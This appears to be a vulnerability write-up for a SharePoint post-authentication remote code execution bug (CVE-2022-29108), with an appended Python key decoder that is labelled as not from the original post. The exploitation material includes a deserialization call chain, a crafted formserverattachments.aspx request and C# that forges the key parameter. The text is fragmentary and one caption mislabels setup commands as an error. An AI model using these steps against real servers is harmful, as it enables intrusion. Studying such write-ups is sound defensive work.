Old wine in a new bottle: SharePoint Post-Auth RCE (CVE-2022-29108)

  • The first condition is that the “Self-Service Site Creation” feature is disabled by default, so an ordinary user on a default configuration cannot create sub-sites ¯\_(ツ)_/¯
  • The second condition is that CVE-2022-22005 relies on SharePoint's State Service, which does not exist at all in a default setup. This is the error you get when the State Service has not been enabled:
# Enable the State Service: create the service application, its database and a proxy in the default proxy group
# Create new "State Service" application
$StateService_application = New-SPStateServiceApplication -Name "State Service"
# Create DB for State Service Application
$StateService_applicationDB = New-SPStateServiceDatabase -Name "KnowledgeJunction_SP_StateService" -ServiceApplication $StateService_application
# Create proxy for State Service application
New-SPStateServiceApplicationProxy -Name "KnowledgeJunction_SP_StateService" -ServiceApplication $StateService_application -DefaultProxyGroup
# Initialize the schema of the newly created State Service database
Initialize-SPStateServiceDatabase -Identity $StateService_applicationDB
ChartPreviewImage.Render()
> ChartAdminPageBase.FetchFromCurrentWorkingSet()
> ChartAdminPageBase.get_currentWorkingSet()
> BinaryFormatter.Deserialize()
  • Step 1: store the payload. First, download and install Microsoft InfoPath.
  • Step 2: Get the payload session id
GET /_layouts/15/formserverattachments.aspx?fid=1&sid=AF43TO7UGLAA4TVXQCDXC4WIQFTCAL2MNFZXI4ZPORSXG5BRGEYS6SLUMVWS65DFNVYGYYLUMUXHQ43OFNBXQ53RGRYDISTOJN2VSMTIONCFC4DVG5AWE5K2JBIVCM2HJRHUOOLUNZBU4SSHOJNDEYY=TC6s5QU93BoIZJdquPLcFPGQeeyGztEj4/i9xhD6rw4waUi3tnI60RaX09aC3H70OnD6cKSOK8Bsf4j1b/MmCw==|637879277981015089&key=BAIkY2UyMTcyNmQtNDNmZi00MWEzLTkyMDQtOTgxYTE5ZTc1ODI3QWU5ZjUxYmM2YTgxNzRiNmViMWM3Y2ZhZTY3NmJlNGFkX2UzOWQwYzgyZDAyZjRhYzc4NjQ5NWE5OTA1NjJkYzg0gAhF&dl=ip HTTP/1.1
Host: sharepoint
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Cookie: _InfoPath_CanaryValueAF43TO7UGLAA4TVXQCDXC4WIQFTCAL2MNFZXI4ZPORSXG5BRGEYS6SLUMVWS65DFNVYGYYLUMUXHQ43OFNBXQ53RGRYDISTOJN2VSMTIONCFC4DVG5AWE5K2JBIVCM2HJRHUOOLUNZBU4SSHOJNDEYY=TC6s5QU93BoIZJdquPLcFPGQeeyGztEj4/i9xhD6rw4waUi3tnI60RaX09aC3H70OnD6cKSOK8Bsf4j1b/MmCw==|637879277981015089;
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: Keep-Alive
AF43TO7UGLAA4TVXQCDXC4WIQFTCAL2MNFZXI4ZPORSXG5BRGEYS6SLUMVWS65DFNVYGYYLUMUXHQ43OFNBXQ53RGRYDISTOJN2VSMTIONCFC4DVG5AWE5K2JBIVCM2HJRHUOOLUNZBU4SSHOJNDEYY=TC6s5QU93BoIZJdquPLcFPGQeeyGztEj4/i9xhD6rw4waUi3tnI60RaX09aC3H70OnD6cKSOK8Bsf4j1b/MmCw==|637879277981015089
using System;
using System.IO;

// Builds the base64 value passed as key= to formserverattachments.aspx.
// EnhancedBinaryWriter is SharePoint's internal InfoPath Forms Services type; its
// private fields (_state, _itemId, ...) are assigned directly here, so this only
// compiles against a reference assembly that exposes them.
class Program
{
    static void Main()
    {
        MemoryStream ms = new MemoryStream();
        EnhancedBinaryWriter enhancedBinaryWriter = new EnhancedBinaryWriter(ms);
        enhancedBinaryWriter._state = 4;
        enhancedBinaryWriter._dataType = 2;
        // Attachment item id and serialized key, as embedded in the key= parameter of the request above
        enhancedBinaryWriter._itemId = "ce21726d-43ff-41a3-9204-981a19e75827";
        enhancedBinaryWriter._serializedKey = "e9f51bc6a8174b6eb1c7cfae676be4ad_e39d0c82d02f4ac786495a990562dc84";
        enhancedBinaryWriter._size = 1024;
        enhancedBinaryWriter._version = 69;
        enhancedBinaryWriter.Serialize(enhancedBinaryWriter);
        // The serialized bytes, base64-encoded, are the key= value
        var base64String = Convert.ToBase64String(ms.ToArray());
        Console.WriteLine(base64String);
    }
}
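The key= value in the request above is the base64 of exactly the six fields the C# program sets, written with .NET BinaryWriter conventions: a 7-bit-varint length prefix before each UTF-8 string (0x24 = 36 before the GUID, 0x41 = 65 before the serialized key) and 1024 encoded as the two bytes 80 08. The Python below is an added example, not code from the original post; it decodes the page's own key value and rebuilds it from the fields. The field order is taken from the C# above; treating _size as a 7-bit varint and _state, _dataType and _version as single bytes is an assumption that the decoded bytes are consistent with but, for values below 128, cannot distinguish from other encodings.

```python
import base64
import uuid

# key= value copied from the formserverattachments.aspx request on this page.
KEY_B64 = ("BAIkY2UyMTcyNmQtNDNmZi00MWEzLTkyMDQtOTgxYTE5ZTc1ODI3QWU5ZjUxYmM2YTgxNzRiNmViMWM3"
           "Y2ZhZTY3NmJlNGFkX2UzOWQwYzgyZDAyZjRhYzc4NjQ5NWE5OTA1NjJkYzg0gAhF")


def write_7bit(n: int) -> bytes:
    """.NET BinaryWriter.Write7BitEncodedInt: base-128, low group first, high bit = more."""
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def read_7bit(buf: bytes, pos: int):
    """Inverse of write_7bit; returns (value, new_pos). Rejects more than 5 bytes like BinaryReader."""
    n = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        n |= (b & 0x7F) << shift
        if not b & 0x80:
            return n, pos
        shift += 7
        if shift > 28:
            raise ValueError("malformed 7-bit encoded int")


def write_string(s: str) -> bytes:
    """BinaryWriter.Write(string): 7-bit length prefix, then UTF-8 bytes."""
    data = s.encode("utf-8")
    return write_7bit(len(data)) + data


def read_string(buf: bytes, pos: int):
    """Inverse of write_string; returns (text, new_pos)."""
    n, pos = read_7bit(buf, pos)
    if pos + n > len(buf):
        raise ValueError("string length runs past end of buffer")
    return buf[pos:pos + n].decode("utf-8"), pos + n


def encode_key(state, data_type, item_id, serialized_key, size, version) -> str:
    """Rebuild the key= parameter from the six fields the C# program sets (field order assumed from it)."""
    raw = (bytes([state, data_type])        # assumed single bytes (values < 128)
           + write_string(item_id)
           + write_string(serialized_key)
           + write_7bit(size)               # 1024 appears on the wire as 80 08
           + bytes([version]))              # assumed single byte
    return base64.b64encode(raw).decode("ascii")


def decode_key(key_b64: str) -> dict:
    """Parse a key= value back into its fields, refusing input that leaves unconsumed bytes."""
    raw = base64.b64decode(key_b64)
    if len(raw) < 4:
        raise ValueError("key too short")
    state, data_type = raw[0], raw[1]
    item_id, pos = read_string(raw, 2)
    serialized_key, pos = read_string(raw, pos)
    size, pos = read_7bit(raw, pos)
    version = raw[pos]
    pos += 1
    if pos != len(raw):
        raise ValueError(f"{len(raw) - pos} trailing bytes after version")
    uuid.UUID(item_id)  # _itemId must be a GUID string; raises on garbage
    return {"state": state, "data_type": data_type, "item_id": item_id,
            "serialized_key": serialized_key, "size": size, "version": version}


if __name__ == "__main__":
    fields = decode_key(KEY_B64)
    for name, value in fields.items():
        print(f"{name:15} {value}")
    # Round trip: re-encoding the decoded fields must give back the page's key verbatim
    assert encode_key(**fields) == KEY_B64
```

Running it prints state 4, data_type 2, the GUID and serialized key from the C# above, size 1024 and version 69, and the round-trip assertion confirms that the C# fields are the whole content of the key: nothing in it is bound to the session, so the value is purely a client-controlled descriptor of the stored item.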
